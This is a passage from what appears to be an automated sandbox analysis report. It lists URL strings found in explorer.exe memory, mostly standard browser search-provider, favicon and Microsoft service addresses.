Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000006.00000002.2377357906.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000006.00000000.2095643111.0000000004F30000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000006.00000000.2094502203.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2095058843.00000000042CB000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.2094118095.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2104512948.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000006.00000000.2095285782.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.2094502203.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.2104512948.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000006.00000002.2377357906.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2095285782.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000006.00000000.2094304052.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2094502203.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.2095285782.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2094118095.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000006.00000000.2094118095.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpl
Source: explorer.exe, 00000006.00000000.2094875114.00000000041AD000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: explorer.exe, 00000006.00000000.2094304052.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
